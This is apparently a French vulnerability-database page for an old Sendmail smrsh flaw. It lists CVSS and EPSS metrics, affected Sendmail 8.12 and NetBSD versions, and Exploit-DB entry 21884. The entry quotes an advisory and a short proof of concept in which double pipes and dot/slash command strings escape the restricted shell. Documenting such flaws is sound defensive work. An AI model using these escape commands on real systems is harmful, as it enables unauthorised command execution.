Métriques
Métriques |
Score |
Gravité |
CVSS Vecteur |
Source |
V2 |
4.6 |
|
AV:L/AC:L/Au:N/C:P/I:P/A:P |
nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 21884
Date de publication : 2002-09-30 22h00 +00:00
Auteur : zen-parse
EDB Vérifié : Yes
source: https://www.securityfocus.com/bid/5845/info
Sendmail is a freely available, open source mail transport agent. It is maintained and distributed by the Sendmail Consortium. Sendmail is available for the Unix and Linux operating systems.
smrsh is designed to prevent the execution of commands outside of the restricted environment. However, when commands are entered using either double pipes (||) or a mixture of dot (.) and slash (/) characters, a user may be able to bypass the checks performed by smrsh. This could lead to the execution of commands outside of the restricted environment.
$ echo "echo unauthorized execute" > /tmp/unauth
$ smrsh -c ". || . /tmp/unauth || ."
/bin/sh: /etc/smrsh/.: is a directory
unauthorized execute
OR one of the following types of commands:
smrsh -c "/ command"
smrsh -c "../ command"
smrsh -c "./ command"
smrsh -c "././ command"
Products Mentioned
Configuraton 0
Sendmail>>Sendmail >> Version 8.12.0
Sendmail>>Sendmail >> Version 8.12.1
Sendmail>>Sendmail >> Version 8.12.2
Sendmail>>Sendmail >> Version 8.12.3
Sendmail>>Sendmail >> Version 8.12.4
Sendmail>>Sendmail >> Version 8.12.5
Sendmail>>Sendmail >> Version 8.12.6
Configuraton 0
Netbsd>>Netbsd >> Version 1.5
Netbsd>>Netbsd >> Version 1.5.1
Netbsd>>Netbsd >> Version 1.5.2
Netbsd>>Netbsd >> Version 1.5.3
Netbsd>>Netbsd >> Version 1.6
Références